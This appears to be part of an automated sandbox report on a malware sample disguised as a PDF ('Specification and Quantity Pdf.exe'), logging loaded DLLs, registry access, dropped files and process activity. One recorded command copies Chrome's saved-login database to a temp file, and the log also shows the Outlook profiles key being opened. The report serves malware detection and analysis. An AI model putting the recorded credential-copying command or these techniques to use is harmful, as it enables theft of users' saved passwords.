          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /VJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: icu.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile written: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Specification and Quantity Pdf.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: Specification and Quantity Pdf.exeStatic file information: File size 1678432 > 1048576
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Specification and Quantity Pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Specification and Quantity Pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: firefox.pdbP source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wmplayer.pdbGCTL source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wmplayer.pdb source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: firefox.pdb source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp
          Source: Specification and Quantity Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Specification and Quantity Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Specification and Quantity Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Specification and Quantity Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Specification and Quantity Pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: Specification and Quantity Pdf.exeStatic PE information: section name: .managed
          Source: Specification and Quantity Pdf.exeStatic PE information: section name: hydrated
          Source: Specification and Quantity Pdf.exe.0.drStatic PE information: section name: .managed
          Source: Specification and Quantity Pdf.exe.0.drStatic PE information: section name: hydrated
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00416822 push 943AA45Fh; iretd 6_2_00416929
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00417095 push ecx; retf 6_2_00417096
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004170AB push edi; ret 6_2_004170C1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041690C push 943AA45Fh; iretd 6_2_00416929
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041F12D push cs; ret 6_2_0041F13C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041EA08 push eax; ret 6_2_0041EA09
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041D4E2 push eax; ret 6_2_0041D4E8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041D4EB push eax; ret 6_2_0041D552
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041D495 push eax; ret 6_2_0041D4E8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041D54C push eax; ret 6_2_0041D552
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00416503 push cs; iretd 6_2_00416504
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004165F4 push edi; retf 6_2_004165FB
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041E5A0 push dword ptr [9047960Ah]; ret 6_2_0041E5C2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004175A6 push ebp; ret 6_2_004175A7
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00416647 push ecx; retf 6_2_00416653
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038309AD push ecx; mov dword ptr [esp], ecx6_2_038309B6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5EB1E push esp; retn 0000h6_2_03B5EB1F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5EB02 push esp; retn 0000h6_2_03B5EB03
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5E9B5 push esp; retn 0000h6_2_03B5EAE7
          Source: C:\Windows\explorer.exeCode function: 8_2_0E797B1E push esp; retn 0000h8_2_0E797B1F
          Source: C:\Windows\explorer.exeCode function: 8_2_0E797B02 push esp; retn 0000h8_2_0E797B03
          Source: C:\Windows\explorer.exeCode function: 8_2_0E7979B5 push esp; retn 0000h8_2_0E797AE7
          Source: C:\Windows\explorer.exeCode function: 8_2_10A4A9B5 push esp; retn 0000h8_2_10A4AAE7
          Source: C:\Windows\explorer.exeCode function: 8_2_10A4AB02 push esp; retn 0000h8_2_10A4AB03
          Source: C:\Windows\explorer.exeCode function: 8_2_10A4AB1E push esp; retn 0000h8_2_10A4AB1F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E96883 push ecx; ret 10_2_00E96896
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E9682D push ecx; ret 10_2_00E96840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044A09AD push ecx; mov dword ptr [esp], ecx10_2_044A09B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003570AB push edi; ret 10_2_003570C1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00357095 push ecx; retf 10_2_00357096
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035F12D push cs; ret 10_2_0035F13C
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeFile created: C:\Users\user\Specification and Quantity Pdf.exeJump to dropped file
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeFile created: C:\Users\user\Specification and Quantity Pdf.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeFile created: C:\Users\user\Specification and Quantity Pdf.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (102).png
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
